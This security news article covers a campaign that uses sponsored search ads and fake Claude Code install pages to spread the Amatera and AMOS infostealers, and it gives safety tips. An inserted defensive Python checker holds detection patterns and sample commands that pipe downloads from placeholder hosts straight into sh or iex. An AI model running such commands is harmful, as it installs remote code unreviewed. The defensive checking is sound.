
    This fake Claude Code malware could hit anyone who isn’t careful


    AI developer tools are gaining popularity fast, which makes them prime targets for hackers. Researchers at Kaspersky discovered a malware campaign disguised as Claude Code installation instructions.

    Hackers are using sponsored Google Ads to redirect users to pages that look official. Running the commands from these pages installs malware instead of Claude Code, putting both personal and business data at risk.

    Other AI tools are at risk, too

    Claude Code is not the only target; OpenClaw and Doubao have also been affected. Attackers are exploiting the rush to try trending AI tools to spread malware efficiently.


    These attacks rely on users copying and running installation commands from unverified pages. Anyone who follows a sponsored link or executes commands without checking the domain and instructions can end up installing malware instead of Claude Code.

    How the malware works

    The malware differs depending on your operating system. Windows users risk installing Amatera, which collects files, browser data, and cryptocurrency wallet information.

    Mac users are exposed to AMOS, malware designed to steal information from Apple devices. Both types send stolen data to remote servers, which can include sensitive personal and professional files.

    Why sponsored ads are dangerous

    Sponsored ads can look legitimate, and attackers sometimes abuse or compromise advertiser accounts to place deceptive download links in search results. In this campaign, the ads led users to pages that mimicked official Claude Code documentation.

    Developers searching for Claude Code might click the top ad, thinking it is safe. This often leads to malware installation instead of the intended software.

    Little-known fact: Infostealer malware has stolen an estimated 1.8 billion credentials in 2025 alone, driving the majority of automated credential theft and making it one of the fastest-growing threats globally.

    Past attacks show a recurring pattern

    Kaspersky reported a related AMOS campaign in December 2025 that used paid Google ads and a malicious shared ChatGPT page to trick macOS users into running harmful terminal commands.

    The attackers follow a consistent strategy: exploit trust, target high-demand software, and hope users copy commands blindly. The pattern shows that AI developer tools are becoming frequent targets.

    The risk to developers is serious

    Developers often have access to sensitive files and business projects. Malware infections can compromise intellectual property and internal company data.

    Hackers count on this to expand the impact of their attacks beyond personal information. A single infected developer system can put entire networks at risk.

    Tips to stay safe online

    Always verify links and download software only from official sources. Avoid clicking sponsored ads without checking the URL carefully.

    Never blindly copy and paste terminal commands; understand what they do before running them. Trusted security software can detect threats before damage occurs.

    Check commands before running

    Even experienced developers can fall for fake instructions if they are not careful. Reviewing commands against official guides is essential to prevent malware installation.

    Hackers exploit trust in official-looking pages and the urgency to try trending tools. Taking the extra time to verify commands protects both personal and business information.
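One way to apply the "check the domain and the command" advice before pasting anything into a terminal, as an added example that is not from the original article or the researchers' report: a small Python reviewer that extracts every URL from a pasted install command and flags hosts outside an allowlist, plain-HTTP downloads, download-to-interpreter pipes and encoded payloads. The allowlist entry `docs.vendor.example` and all sample commands are constructed placeholders; fill the allowlist from the vendor's own documentation.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts you copied from the vendor's own documentation.
# "docs.vendor.example" is a constructed placeholder, not a real install host.
TRUSTED_HOSTS = {"docs.vendor.example"}

URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+", re.I)
# Downloaded content handed straight to an interpreter is never reviewed.
PIPE_TO_SHELL_RE = re.compile(
    r"\b(curl|wget|irm|iwr|invoke-webrequest|invoke-restmethod)\b.*"
    r"\|\s*(sudo\s+)?(sh|bash|zsh|iex|invoke-expression)\b", re.I)
# Encoded arguments hide what will actually run.
ENCODED_RE = re.compile(
    r"base64\s+(-d|--decode)|-enc(odedcommand)?\b|frombase64string", re.I)


def review_command(command, trusted_hosts=TRUSTED_HOSTS):
    """Return findings for a pasted install command; an empty list means no flags."""
    findings = []
    for url in URL_RE.findall(command):
        parts = urlsplit(url)
        # .hostname ignores any "user@" prefix, so trusted-name@other-host
        # is judged by the host that is really contacted.
        host = (parts.hostname or "").lower()
        if parts.scheme.lower() != "https":
            findings.append(f"non-HTTPS download: {host}")
        # Exact match only: a lookalike that merely contains the name fails.
        if host not in trusted_hosts:
            findings.append(f"untrusted host: {host}")
    if PIPE_TO_SHELL_RE.search(command):
        findings.append("download piped into an interpreter")
    if ENCODED_RE.search(command):
        findings.append("encoded payload")
    return findings


# Constructed sample commands, not taken from the campaign.
SAMPLES = [
    "curl -fsSL https://docs.vendor.example/install.sh -o install.sh",
    "curl -fsSL https://docs.vendor.example.setup-guide.example.net/i.sh | bash",
    "curl -s https://docs.vendor.example@files.example.org/i.sh | sh",
    "irm http://files.example.org/i.ps1 | iex",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(cmd, "->", review_command(cmd) or "no flags")
```

An empty result only means none of these checks fired; the downloaded script itself still needs to be read before it is run.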

    Use security solutions proactively

    Anti-malware programs, firewalls, and regular updates reduce the risk of infection. Staying proactive with security habits is simpler than dealing with stolen data later.

    Developers should combine caution with reliable tools to prevent malware campaigns from succeeding. This approach is the best defense against AI-related malware attacks.

    Be cautious with new AI tools

    Interest in AI tools is rising, and recent campaigns show attackers are using that popularity as bait. Developers should stay cautious and avoid shortcuts when installing new software.

    Sponsored links and fake installation pages have recently been used to spread malware through search results. Staying alert and verifying the domain before clicking can reduce the risk of infection.

    Educate teams and colleagues

    Sharing knowledge about malware risks can prevent widespread infections in a company. Developers should train peers to verify commands and links before executing them.


    A culture of caution strengthens the overall security of a team. Awareness and vigilance are the first lines of defense against disguised malware.

    Stay safe while exploring AI

    Fake Claude Code malware is a growing threat that can impact anyone who is careless with downloads. Verifying links, reviewing commands, and using security tools are essential steps to stay protected.

    Recent campaigns show that attackers are already adapting familiar social-engineering tactics to popular AI products. Developers should stay informed and verify downloads and commands before installing new tools.

    Even a single misstep can expose personal information, business data, or intellectual property. Teams and individuals should treat every download and command as potentially risky unless verified.

    Sharing knowledge and best practices with colleagues strengthens overall security. Awareness, vigilance, and proactive habits are the most effective defense against disguised malware targeting AI tools.

    TL;DR

    • Hackers are disguising malware as Claude Code and other AI tools.
    • Sponsored Google Ads redirect developers to fake installation pages.
    • Windows users risk Amatera; macOS users risk AMOS.
    • Verify links, check commands, and use trusted security software to stay safe.
    • Awareness and caution prevent personal and business data loss.

    This article was made with AI assistance and human editing.
